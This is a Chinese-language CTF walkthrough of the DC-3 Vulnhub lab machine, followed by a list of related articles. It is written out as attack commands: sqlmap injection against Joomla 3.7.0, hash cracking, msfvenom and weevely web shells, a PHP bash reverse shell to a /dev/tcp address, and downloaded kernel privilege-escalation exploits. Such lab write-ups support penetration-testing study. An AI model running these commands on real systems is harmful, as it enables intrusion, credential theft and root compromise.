【CTF】靶机:DC-3

简介: 本靶机适合初学者进行练习,适合已经了解渗透流程,有整体思路的初学者进行学习。 本文将从头讲解,并配有视频教程。

靶机下载地址
链接:https://pan.baidu.com/s/1t0Tppz4tV6whenJMd2KnEw
提取码:6hac
--来自百度网盘超级会员V4的分享
视频教程
https://www.bilibili.com/video/BV11a411d78T

收集信息
扫描靶机ip与端口
请输入图片描述
我们看到靶机只开放了80端口
于是我们访问网站,并识别出网站程序为joomla
请输入图片描述
于是我们使用专门针对joomla的扫描工具joomscan
joomscan -u http://192.168.226.136
请输入图片描述
kali没有这款工具的,可以使用apt install joomscan命令进行安装
我们打开joomlascan后,对网站进行扫描
请输入图片描述
我们得到了后台地址
http://192.168.226.136/administrator/
与joomla的版本 3.7.0
于是,我们使用searchsploit进行扫描
searchploit joomla 3.7.0
请输入图片描述
我们找到sql注入漏洞,打开文本
searchploit -p 42033
我们看到使用方法,直接运行sqlmap即可
请输入图片描述

sqlmap

-u url

–risk (1-3)

–level (1-5)

–random-agent

–dbs

-p list[X]

-D db

–tables //show all tables in db

-T table

–columns //show all columns selected by table

--dump //查看字段名

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] --batch -D joomladb --tables

sqlmap -u "http://192.168.226.136/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -D joomladb -T "#__users" -C username,password -dump

请输入图片描述
请输入图片描述

john解密哈希

我们创建一个文本
vi 1.txt
输入哈希密码
john --show 1.txt
请输入图片描述
解密成功snoopy

后门生成

法1:msfvenom

msfvenom -p php/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=1234 -f raw > shell.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.226.129 LPORT=4444 -f raw > shell.php
请输入图片描述

进入后台,编辑模板
请输入图片描述
创建文件,编写文件,放入我们准备好的木马源码
请输入图片描述
进入msf
请输入图片描述
输入

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp
请输入图片描述

设置监听地址,即kali地址

set lhost 192.168.226.129

输入run运行

然后我们就拿到了shell

python -c 'import pty;pty.spawn("/bin/bash")'
获得交互shell

法2:weevely(无回显)

生成Shell

weevely generate <文件名>

weevely generate 123456 shell.php

weevely http://192.168.226.137/templates/beez3/7723.php 123456

python -m http.server 9999

法3:反弹shell

反弹shell,就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。

通俗点说,反弹shell就是一种反向链接,与正向的ssh等不同,它是在对方电脑执行命令连接到我方的攻击模式,并且这种攻击模式必须搭配远程执行命令漏洞来使用。

由于防火墙等限制,对方机器只能发送请求,不能接收请求

对于病毒,木马,受害者什么时候能中招,对方的网络环境是什么样的,什么时候开关机,都是未知,建立一个服务端,让恶意程序主动连接,才是上策。

那我们开始吧!
首先,上传代码
请输入图片描述

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.64.154/8888 0>&1'");?>

下来,进行监听

nc -l -vv -p 8888
请输入图片描述

然后进入shell

利用漏洞提权
法1:

CVE:[2016-4557]

Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' bpf(BPF_PROG_LOAD) Privilege Escalation - Linux local Exploit (exploit-db.com)

https://www.zacarx.com/a/aa/39772.zip

python -m SimpleHTTPServer 888
请输入图片描述
shell端解压,运行
请输入图片描述
请输入图片描述
拿到权限
去家目录,拿到flag
请输入图片描述

法2:
CVE-2021-4034漏洞exp

https://github.com/berdav/CVE-2021-4034

利用脚本:https://www.zacarx.com/a/aa/CVE-2021-4034-main.zip

我们下载脚本
请输入图片描述
解压,运行脚本
操作如图
请输入图片描述
拿到flag!!
请输入图片描述

目录
相关文章
|
1月前
|
安全 Linux 网络安全
Neos的渗透测试靶机练习——DC-3
Neos的渗透测试靶机练习——DC-3
31 4
|
1月前
|
安全 Shell 网络安全
Neos的渗透测试靶机练习——DC-1
Neos的渗透测试靶机练习——DC-1
36 4
|
1月前
|
安全 Shell 网络安全
DC-2靶机上了解和练习WordPress框架
本文介绍了在一个名为DC2的虚拟环境中进行渗透测试的过程。首先通过扫描发现SSH和Web端口,并进行全端口扫描以寻找隐藏端口。接着通过信息收集、漏洞利用(如SQL注入、文件上传漏洞等)、反弹Shell及提权等步骤逐步攻陷目标系统。文章详细描述了使用Cewl生成字典、Dirsearch扫描目录、Wpscan枚举WordPress用户等技巧,并最终通过SSH登录和Git命令实现了提权,获取多个flag。
|
2月前
|
安全 中间件 Shell
渗透测试-靶机DC-2-知识点总结
渗透测试-靶机DC-2-知识点总结
35 0
|
2月前
|
安全 网络协议 Shell
渗透测试-靶机DC-1-知识点总结
渗透测试-靶机DC-1-知识点总结
39 0
|
安全 Shell 数据库
Vulnhub靶机DC-1渗透笔记
关于Vulnhub Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试虚拟机下载。 新手入门DC-1: 下载地址: https://www.vulnhub.com/entry/dc-1-1,292/
107 2
Vulnhub靶机DC-1渗透笔记
|
存储 SQL 安全
VulnHub靶机DC3渗透笔记
Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战 从靶机DC-3开始,只有一个最终的flag,只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:http://www.five86.com/downloads/DC-3-2.zip
130 1
VulnHub靶机DC3渗透笔记
|
存储 网络协议 网络安全
VulnHub靶机DC2渗透测试笔记
靶机下载地址: https://download.vulnhub.com/dc/DC-2.zip 靶机难度:入门 靶机描述:和DC-1 一样,有五个标志,包括最终标志。
84 0
VulnHub靶机DC2渗透测试笔记
|
安全 关系型数据库 MySQL
DC-1靶机渗透(教程以及思路)
DC-1靶机渗透(教程以及思路)
141 0
|
SQL 安全 Shell
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
看完这篇 教你玩转渗透测试靶机vulnhub——DC3
326 0